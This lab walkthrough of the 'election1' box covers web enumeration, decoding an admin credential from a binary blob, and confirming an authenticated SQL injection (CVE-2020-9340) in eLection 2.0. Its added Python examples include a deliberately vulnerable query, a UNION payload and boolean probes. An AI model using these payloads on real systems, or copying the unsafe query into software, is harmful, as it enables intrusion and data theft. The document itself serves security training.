Web


Nmap discovered a web service on port 80 of host 192.168.209.211. The running service is Apache httpd 2.4.29 (Ubuntu).

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 18:09:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: text/html
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -I http://$IP/        
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 18:09:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 20 Oct 2019 15:04:12 GMT
ETag: "2aa6-59558e1434548"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html

Webroot


It’s the default Apache installation page.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.209.211/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess               [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htaccess.html          [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htaccess.txt           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
.htaccess.php           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd               [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd.html          [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd.php           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
.htpasswd.txt           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 22ms]
election                [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 21ms]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 21ms]
javascript              [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 21ms]
phpinfo.php             [Status: 200, Size: 95498, Words: 4715, Lines: 1170, Duration: 27ms]
phpmyadmin              [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 20ms]
robots.txt              [Status: 200, Size: 30, Words: 1, Lines: 5, Duration: 19ms]
robots.txt              [Status: 200, Size: 30, Words: 1, Lines: 5, Duration: 21ms]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1587 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.209.211/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 21ms]
icons                   [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 23ms]
javascript              [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
election                [Status: 200, Size: 7003, Words: 1676, Lines: 173, Duration: 266ms]
phpmyadmin              [Status: 200, Size: 10531, Words: 504, Lines: 26, Duration: 408ms]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1923 req/sec :: Duration: [0:02:02] :: Errors: 0 ::
  • /election/
  • /phpinfo.php
  • /phpmyadmin/
  • /robots.txt

/robots.txt


Of the paths listed in robots.txt, only /election/ actually exists.

/phpmyadmin/


A phpMyAdmin instance is hosted at the /phpmyadmin/ endpoint. No credentials are known at this time.

/phpinfo.php


phpinfo.php is exposed and discloses the PHP configuration. DOCUMENT_ROOT is set to /var/www/html, which gives the absolute path of the web root for any later file-read or file-write primitive.

/election/ Endpoint


The /election/ endpoint hosts an eLection instance by the Tripath Project.

The source code is publicly available for review. The latest release is version 2.0, published over seven years ago.

Checking the Candidates section reveals a single user. The candidate data appears to be fetched from a database, which makes the parameters feeding that query worth testing for SQL injection.

Fuzzing /election/ Endpoint


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/election/FUZZ -ic -e .html,.txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.209.211/election/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin                   [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 25ms]
card.php                [Status: 200, Size: 1935, Words: 215, Lines: 2, Duration: 22ms]
data                    [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 21ms]
index.php               [Status: 200, Size: 7003, Words: 1676, Lines: 173, Duration: 27ms]
js                      [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 22ms]
languages               [Status: 301, Size: 331, Words: 20, Lines: 10, Duration: 21ms]
lib                     [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 21ms]
media                   [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 20ms]
themes                  [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 19ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1980 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
  • /admin/
  • /card.php

/card.php Endpoint


The /election/card.php endpoint hosts a blob of binary (base-2) digits.

Decoding

The blob is encoded twice: decoding the bits to ASCII yields another binary string, and decoding that yields a credential; 1234:Zxc123!@#
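The decoding step above, as an added example that is not part of the original writeup or of the eLection project. The sample blob is constructed by encoding the credential twice with the same helper, so it is not the real contents of card.php; the decoder peels layers until the output stops looking like binary text and handles both space-separated and contiguous bit strings.

```python
"""Decode a text blob made of binary (base-2) digits, repeating while the
result is itself still binary text. Added example, not from the page or the
eLection project; SAMPLE_BLOB below is constructed and is NOT the real
contents of /election/card.php."""
import re


def encode_binary(text: str) -> str:
    """Encode text as space-separated 8-bit groups (only used to build the sample)."""
    return " ".join(f"{b:08b}" for b in text.encode("utf-8"))


def looks_binary(text: str) -> bool:
    """True if, ignoring whitespace, the text is non-empty and only 0/1 digits."""
    bits = re.sub(r"\s+", "", text)
    return bool(bits) and set(bits) <= {"0", "1"}


def decode_binary_once(text: str) -> str:
    """Decode one layer: strip whitespace, cut into 8-bit groups, map to bytes."""
    if not looks_binary(text):
        raise ValueError("input is not a binary string")
    bits = re.sub(r"\s+", "", text)
    if len(bits) % 8:
        raise ValueError(f"bit length {len(bits)} is not a multiple of 8")
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return data.decode("utf-8")


def decode_binary_layers(text: str, max_rounds: int = 8):
    """Peel binary layers until the output no longer looks binary.

    Returns (plaintext, number_of_layers_removed). max_rounds guards against
    a blob whose plaintext happens to consist only of 0/1 characters.
    """
    rounds = 0
    current = text
    while looks_binary(current) and rounds < max_rounds:
        current = decode_binary_once(current)
        rounds += 1
    return current, rounds


# Constructed sample: the credential from the page encoded twice (NOT the real blob).
SAMPLE_CREDENTIAL = "1234:Zxc123!@#"
SAMPLE_BLOB = encode_binary(encode_binary(SAMPLE_CREDENTIAL))

if __name__ == "__main__":
    plaintext, layers = decode_binary_layers(SAMPLE_BLOB)
    print(f"layers removed: {layers}")
    print(f"decoded: {plaintext}")
    user, _, password = plaintext.partition(":")
    print(f"user={user} password={password}")
```

To use it against the real endpoint, fetch card.php with curl, paste the body into SAMPLE_BLOB (or read it from a file) and run the script; the layer count tells you how many times the blob was encoded.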

Admin Panel


The admin panel is available at the /election/admin/ endpoint. The default credential is 1234:1234, but the valid credential recovered from card.php above, 1234:Zxc123!@#, is used instead.

Successfully authenticated.

Version Information

The Settings menu discloses the version: 2.0

Vulnerabilities

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1/source_code]
└─$ searchsploit eLection 2.0
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
eLection 2.0 - 'id' SQL Injection   | php/webapps/48122.txt
------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

eLection 2.0 suffers from an authenticated SQL injection in the id parameter, tracked as CVE-2020-9340. Exploiting it requires a valid admin session, which the credential recovered from card.php provides.
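The vulnerability class behind both the Candidates observation above and CVE-2020-9340, an id parameter spliced into SQL text, as an added example that is not eLection's code. The schema, table names (candidates, admin_users) and data are constructed stand-ins in an in-memory SQLite database, not the application's real tables; the block shows the vulnerable query beside its parameterized fix, a UNION payload that reads another table, and the boolean probe pair used to confirm injectability before reaching for a full exploit.

```python
"""Vulnerable vs. hardened handling of an integer 'id' request parameter.
Added example with a constructed SQLite schema; the table and column names
are assumptions and not eLection's real ones."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE candidates (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE admin_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO candidates VALUES (1, 'Candidate One');
        INSERT INTO admin_users VALUES (1, 'admin', 'constructed-secret');
        """
    )
    return conn


def candidate_vulnerable(conn: sqlite3.Connection, id_param: str):
    """Vulnerable pattern: the request parameter is concatenated into the SQL."""
    sql = f"SELECT id, name FROM candidates WHERE id = {id_param}"  # unsafe on purpose
    return conn.execute(sql).fetchall()


def candidate_safe(conn: sqlite3.Connection, id_param: str):
    """Hardened pattern: validate the type, then bind the value as a parameter."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name FROM candidates WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchall()


# UNION payload: the injected SELECT must return the same number of columns (2).
UNION_PAYLOAD = "1 UNION SELECT id, username || ':' || password FROM admin_users"
# Boolean probe pair: a differing response to these two confirms the parameter is live.
TRUE_PROBE, FALSE_PROBE = "1 AND 1=1", "1 AND 1=2"


def demo() -> dict:
    """Run each payload against both handlers and collect the observable results."""
    conn = build_db()
    results = {
        "normal": candidate_vulnerable(conn, "1"),
        "union": candidate_vulnerable(conn, UNION_PAYLOAD),
        "true_probe": candidate_vulnerable(conn, TRUE_PROBE),
        "false_probe": candidate_vulnerable(conn, FALSE_PROBE),
        "safe_normal": candidate_safe(conn, "1"),
    }
    try:
        candidate_safe(conn, UNION_PAYLOAD)
        results["safe_union"] = "accepted"
    except ValueError:
        results["safe_union"] = "rejected"
    return results


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:12s} {value}")
```

The true/false probe pair is the cheap check to run first: if `id=1 AND 1=1` returns the candidate and `id=1 AND 1=2` returns nothing, the parameter reaches the query unquoted and a UNION or sqlmap run is justified; if both responses are identical, look elsewhere.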